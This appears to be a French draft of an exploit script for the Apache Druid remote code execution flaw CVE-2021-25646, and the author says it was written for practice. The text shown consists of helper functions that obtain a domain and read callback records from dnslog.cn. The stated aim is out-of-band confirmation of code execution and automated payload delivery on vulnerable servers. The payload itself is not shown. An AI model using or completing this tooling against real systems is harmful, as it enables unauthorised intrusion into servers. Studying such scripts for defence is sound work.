
Script d'exploitation pour la vulnérabilité d'exécution de code à distance CVE-2021-25646 Apache Druid, utilisant la détection hors bande basée sur DNSLog et la livraison automatisée de charges utiles.
En cours de rédaction...
=====================================================================================
Tout d'abord, merci au grand Wker pour ses réponses à distance.
Le but d'écrire ce script est de s'entraîner.
Le script utilise DNSLog pour juger, s'il existe une vulnérabilité, il obtient automatiquement l'URL DNSLog pour effectuer un ping et affiche les résultats.
script\ATTACKUTILS#define dnsqian = Set-Cookie:[
#define dnshou = path=/
#define re = "(.*?)"
function DnsRef(cookie){
res = HttpGet("http://dnslog.cn/getrecords.php?t=0.3741317873165926",cookie.StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
r = StrRe(res[0],re);
if(GetArrayNum(r) >= 3){
return r[3];
}else{
return "";
}
}
function GetDomain(){
array r;
res = HttpGet("http://dnslog.cn/getdomain.php?t=0.16082432252184475","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
tmp = StrSplit(res[0],StrRN());
dns = tmp[0];
cookie = "Cookie: ".GettextMiddle(res[1],dnsqian,dnshou);
ArrayAddEle(r,dns);
ArrayAddEle(r,cookie);
return r;
}
